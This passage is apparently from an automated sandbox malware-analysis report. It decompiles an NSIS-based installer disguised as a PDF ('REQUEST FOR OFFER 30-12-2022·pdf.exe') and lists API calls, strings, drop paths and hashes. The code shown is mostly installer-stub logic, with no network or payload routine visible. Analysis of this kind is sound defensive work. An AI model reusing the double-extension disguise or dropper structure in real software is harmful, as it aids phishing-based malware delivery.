							ShowWindow(_t127, 0xa); // executed
							 *0x425728 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403e07
0x00403e10
0x00403f51
0x00403f55
0x00403f59
0x00403f5b
0x00403f60
0x00403f6b
0x00403f76
0x00403f7b
0x00403f7d
0x00403f7f
0x00403f82
0x00403f87
0x00403f95
0x00403fa2
0x00403fa9
0x00403fa9
0x00403faa
0x00403faa
0x00403faf
0x00403fb5
0x00403fbc
0x00403fc2
0x00403fc4
0x00404004
0x00404009
0x0040400e
0x0040400e
0x00404013
0x0040401c
0x0040401e
0x00404023
0x00404029
0x0040402d
0x0040402d
0x00404032
0x00404038
0x00000000
0x00000000
0x00404043
0x00404049
0x00000000
0x00000000
0x00404052
0x0040405a
0x0040405f
0x00404062
0x00404068
0x0040406d
0x00404070
0x00404076
0x0040407b
0x0040407e
0x00404084
0x0040408c
0x00404092
0x00404098
0x0040409c
0x004040a3
0x004040a3
0x004040a3
0x004040ad
0x004040bf
0x004040cb
0x004040d0
0x004040da
0x004040e0
0x004040e2
0x004040e7
0x004040e4
0x004040e4
0x004040e4
0x004040f7
0x0040410f
0x00404111
0x00404117
0x0040412c
0x00404119
0x00404122
0x00404124
0x00404124
0x00404132
0x00404142
0x00404158
0x0040415f
0x00404165
0x00404169
0x0040416e
0x00404170
0x00000000
0x00404176
0x00404176
0x00404178
0x00000000
0x00000000
0x0040417e
0x00404182
0x004041a7
0x004041ad
0x004041b3
0x004041b5
0x00000000
0x00000000
0x004041db
0x004041e1
0x004041e3
0x004041e8
0x00000000
0x00000000
0x004041ee
0x004041f1
0x004041f4
0x0040420b
0x00404217
0x00404230
0x00404236
0x0040423a
0x0040423f
0x00404245
0x00000000
0x00000000
0x0040424f
0x0040425a
0x00000000
0x0040425a
0x00404184
0x0040418a
0x00000000
0x00000000
0x00404190
0x00404196
0x00000000
0x00000000
0x00000000
0x0040419c
0x00404170
0x00404267
0x00404273
0x0040427a
0x00000000
0x00403fc6
0x00403fc6
0x00403fc9
0x00403ffc
0x00403ffc
0x00403ffe
0x00000000
0x00000000
0x00000000
0x00403ffe
0x00403fcb
0x00403fcf
0x00403fd4
0x00403fd6
0x00000000
0x00000000
0x00403fe6
0x00403fee
0x00000000
0x00403ff4
0x00403e22
0x00403e22
0x00403e26
0x00403e2b
0x00403e3a
0x00403e3a
0x00403e43
0x00403e4c
0x00403e57
0x00403e57
0x00403e63
0x00403e7f
0x00403e82
0x00403e95
0x00403e9b
0x00403f3e
0x00000000
0x00403f47
0x00403ea1
0x00403eae
0x00403eb0
0x00403eb2
0x00403ed1
0x00403ed1
0x00403ed4
0x00403ed9
0x00403edc
0x00403eec
0x00403eed
0x00403eef
0x00403f25
0x00403f38
0x00000000
0x00403f38
0x00403ef1
0x00403ef7
0x00403f10
0x00403f15
0x00403f17
0x00000000
0x00000000
0x00403f19
0x00403f05
0x00403f05
0x00403f07
0x00403f07
0x00000000
0x00403f07
0x00403efa
0x00403eff
0x00000000
0x00403eff
0x00403ede
0x00403ee4
0x00000000
0x00000000
0x00403ee6
0x00000000
0x00403ee6
0x00403ed6
0x00000000
0x00403ed6
0x00403ebc
0x00403ec3
0x00403ec9
0x00403ecb
0x00000000
0x00000000
0x00000000
0x00403ecb
0x00403e87
0x00000000
0x00403e65
0x00403e6b
0x00403e75
0x00404280
0x00404286
0x00404293
0x00404299
0x00404299
0x004042a3
0x00000000
0x004042a3
0x00403e63

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
ShowWindow.USER32(?), ref: 00403E57
DestroyWindow.USER32 ref: 00403E6B
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403E87
GetDlgItem.USER32(?,?), ref: 00403EA8
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
IsWindowEnabled.USER32(00000000), ref: 00403EC3
GetDlgItem.USER32(?,00000001), ref: 00403F71
GetDlgItem.USER32(?,00000002), ref: 00403F7B
SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403FE6
GetDlgItem.USER32(?,00000003), ref: 0040408C
ShowWindow.USER32(00000000,?), ref: 004040AD
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
EnableWindow.USER32(?,?), ref: 004040DA
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F0
EnableMenuItem.USER32(00000000), ref: 004040F7
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040410F
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
SetWindowTextW.USER32(?,00423728), ref: 0040415F
ShowWindow.USER32(?,0000000A), ref: 00404293

Strings

(7B, xrefs: 00404137

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403A5B Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403A5B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a250;
				_t22 = E004065EC(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423728;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004060DF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
					__eflags =  *0x423728;
					if(__eflags == 0) {
						E004060DF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423728, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E00406159(L"1033", _t73 & 0x0000ffff);
				}
				E00403D31(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane";
				 *0x42a2c0 =  *0x42a258 & 0x00000020;
				 *0x42a2dc = 0x10000;
				if(E00405CCE(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane") != 0) {
					L16:
					if(E00405CCE(_t98, _t86) == 0) {
						E00406234(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a240, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429228 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403D31(_t78, __eflags);
							__eflags =  *0x42a2e0;
							if( *0x42a2e0 != 0) {
								_t33 = E00405444(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42920c;
								if( *0x42920c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423708, 5); // executed
							_t39 = E0040657C("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040657C("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291e0);
								 *0x429204 = _t87;
								RegisterClassW(0x4291e0);
							}
							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403DFE, 0); // executed
							E004039AB(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a240;
						 *0x4291e4 = E00401000;
						 *0x4291f0 =  *0x42a240;
						 *0x4291f4 = _t30;
						 *0x429204 = 0x40a3b4;
						if(RegisterClassW(0x4291e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					if( *(_t82 + 0x48) == 0) {
						goto L16;
					}
					_t76 = 0x4281e0;
					E004060DF( *((intOrPtr*)(_t82 + 0x44)),  *0x42a278 + _t78 * 2,  *0x42a278 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
					_t63 =  *0x4281e0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281e2;
						 *((short*)(E00405BF3(0x4281e2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406212(_t86, E00405BC6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405C12(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403a61
0x00403a6a
0x00403a71
0x00403a73
0x00403a87
0x00403a99
0x00403aa2
0x00403aab
0x00403ab2
0x00403ab7
0x00403abe
0x00403ad1
0x00403ad1
0x00403adc
0x00403a75
0x00403a75
0x00403a80
0x00403a80
0x00403ae1
0x00403aeb
0x00403af4
0x00403af9
0x00403b0a
0x00403b9c
0x00403ba4
0x00403bad
0x00403bad
0x00403bc3
0x00403bc9
0x00403bd7
0x00403c58
0x00403c60
0x00403c6a
0x00403c6f
0x00403c75
0x00403cff
0x00403d04
0x00403d06
0x00403d22
0x00000000
0x00403d22
0x00403d08
0x00403d0e
0x00403d16
0x00403d16
0x00000000
0x00403d0e
0x00403c83
0x00403c8e
0x00403c93
0x00403c95
0x00403c9c
0x00403c9c
0x00403ca7
0x00403caf
0x00403cb1
0x00403cb3
0x00403cbc
0x00403cbf
0x00403cc5
0x00403cc5
0x00403ce4
0x00403cf5
0x00000000
0x00403cfa
0x00403c62
0x00403c64
0x00000000
0x00403bd9
0x00403bd9
0x00403be5
0x00403bef
0x00403bf5
0x00403bfa
0x00403c09
0x00403d27
0x00403d27
0x00000000
0x00403d27
0x00403c18
0x00403c53
0x00000000
0x00403c53
0x00403b10
0x00403b10
0x00403b15
0x00000000
0x00000000
0x00403b23
0x00403b35
0x00403b3a
0x00403b43
0x00000000
0x00000000
0x00403b49
0x00403b4b
0x00403b58
0x00403b58
0x00403b61
0x00403b67
0x00403b8f
0x00403b97
0x00000000
0x00403b79
0x00403b7a
0x00403b83
0x00403b89
0x00403b8a
0x00000000
0x00403b8a
0x00403b85
0x00403b87
0x00000000
0x00000000
0x00000000
0x00403b87
0x00403b67

APIs

Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619

GetUserDefaultUILanguage.KERNELBASE(00000002,74E03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00000000), ref: 00403A75

Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166

lstrcatW.KERNEL32(1033,00423728), ref: 00403ADC
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,74E03420), ref: 00403B5C
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
GetFileAttributesW.KERNEL32(Call), ref: 00403B7A
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane), ref: 00403BC3
RegisterClassW.USER32(004291E0), ref: 00403C00
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C18
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C4D
ShowWindow.USER32(00000005,00000000), ref: 00403C83
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403CAF
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403CBC
RegisterClassW.USER32(004291E0), ref: 00403CC5
DialogBoxParamW.USER32(?,00000000,00403DFE,00000000), ref: 00403CE4

Strings

.exe, xrefs: 00403B69
C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane, xrefs: 00403AEB, 00403AF3, 00403B96, 00403B9C, 00403BAC
_Nb, xrefs: 00403BDF, 00403C47
"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", xrefs: 00403A5F
Call, xrefs: 00403B23, 00403B2C, 00403B3A, 00403B89, 00403B8F
1033, xrefs: 00403A7B, 00403AD7
.DEFAULT\Control Panel\International, xrefs: 00403AC7
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A60
(7B, xrefs: 00403A87
RichEdit20W, xrefs: 00403CA7, 00403CAD
RichEd20, xrefs: 00403C89
RichEd32, xrefs: 00403C97
RichEdit, xrefs: 00403CB6
Control Panel\Desktop\ResourceLocale, xrefs: 00403A8F

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-1117008333
Opcode ID: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
Opcode Fuzzy Hash: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402ED5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00402ED5(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42a24c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", 0x400);
				_t105 = E00405DE7(L"C:\\Users\\Arthur\\Desktop\\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", 0x80000000, 3);
				 *0x40a018 = _t105;
				if(_t105 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406212(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe");
				E00406212(0x439000, E00405C12(L"C:\\Users\\Arthur\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x418ee0 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E33(1);
					__eflags =  *0x42a254;
					if( *0x42a254 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E0040670B(0x40ce48);
						E00405E16(0x40ce48,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403402( *0x42a254 + 0x1c);
							 *0x418ee4 = _t65;
							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E0040317B(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a250 = _t110;
								 *0x42a258 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a25c =  *0x42a25c + 1;
									__eflags =  *0x42a25c;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x418ed4; // 0x3bd04
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405DA2(0x42a260, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403402( *0x418ed0);
					_t77 = E004033EC( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a254) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004033EC(0x418ee8, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E33(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a254;
						if( *0x42a254 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E33(0);
							}
							goto L19;
						}
						E00405DA2( &_v40, 0x418ee8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x418ed0; // 0x3f12
						 *0x42a2e0 =  *0x42a2e0 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x42a254 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x418ee0; // 0x54d5
						if(__eflags < 0) {
							_v8 = E0040669D(_v8, 0x418ee8, _t106);
						}
						 *0x418ed0 =  *0x418ed0 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402ee3
0x00402ee6
0x00402f00
0x00402f05
0x00402f18
0x00402f1d
0x00402f23
0x00000000
0x00402f25
0x00402f36
0x00402f47
0x00402f4e
0x00402f54
0x00402f56
0x00402f5b
0x00402f5d
0x0040304d
0x0040304f
0x00403054
0x0040305b
0x00000000
0x00000000
0x00403061
0x00403064
0x00403090
0x00403095
0x004030a0
0x004030a2
0x004030b3
0x004030ce
0x004030d4
0x004030d7
0x004030dc
0x004030fb
0x0040310b
0x0040311d
0x00403122
0x00403127
0x0040312a
0x00403133
0x00403137
0x0040313f
0x00403144
0x00403146
0x00403146
0x00403146
0x0040314e
0x0040314e
0x00403151
0x00403152
0x00403152
0x00403155
0x00403157
0x00403157
0x00403157
0x0040315a
0x00403161
0x0040316d
0x00403172
0x00000000
0x00403172
0x00000000
0x0040312a
0x00000000
0x004030de
0x0040306c
0x00403077
0x0040307c
0x0040307e
0x00000000
0x00000000
0x00403087
0x0040308a
0x00000000
0x00000000
0x00000000
0x00402f63
0x00402f63
0x00402f68
0x00402f6c
0x00402f73
0x00402f78
0x00402f7a
0x00402f7c
0x00402f7c
0x00402f84
0x00402f89
0x00402f8b
0x004030ea
0x0040312c
0x00000000
0x0040312c
0x00402f91
0x00402f97
0x00403017
0x0040301b
0x0040301e
0x00403023
0x00000000
0x0040301b
0x00402fa4
0x00402fa9
0x00402fac
0x00402fb1
0x00000000
0x00000000
0x00402fb3
0x00402fba
0x00000000
0x00000000
0x00402fbc
0x00402fc3
0x00000000
0x00000000
0x00402fc5
0x00402fcc
0x00000000
0x00000000
0x00402fce
0x00402fd5
0x00000000
0x00000000
0x00402fd7
0x00402fdd
0x00402fe6
0x00402fec
0x00402fef
0x00402ff1
0x00402ff7
0x00000000
0x00000000
0x00402ffd
0x00403001
0x00403009
0x00403009
0x0040300c
0x0040300f
0x00403011
0x00403013
0x00403013
0x00000000
0x00403011
0x00403003
0x00403007
0x00000000
0x00000000
0x00000000
0x00403024
0x00403024
0x0040302a
0x0040303a
0x0040303a
0x0040303d
0x00403043
0x00403045
0x00403045
0x00000000
0x00402f63

APIs

GetTickCount.KERNEL32 ref: 00402EE9
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,00000400), ref: 00402F05

Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,80000000,00000003), ref: 00405DEB
Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,80000000,00000003), ref: 00402F4E
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402EDF, 004030AD
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030DE
Inst, xrefs: 00402FBC
soft, xrefs: 00402FC5
"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", xrefs: 00402ED5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040312C
Error launching installer, xrefs: 00402F25
Null, xrefs: 00402FCE
C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, xrefs: 00402EEF, 00402EFE, 00402F12, 00402F2F
C:\Users\user\Desktop, xrefs: 00402F30, 00402F35, 00402F3B

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2590155352
Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406234 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00406234(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				intOrPtr* _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
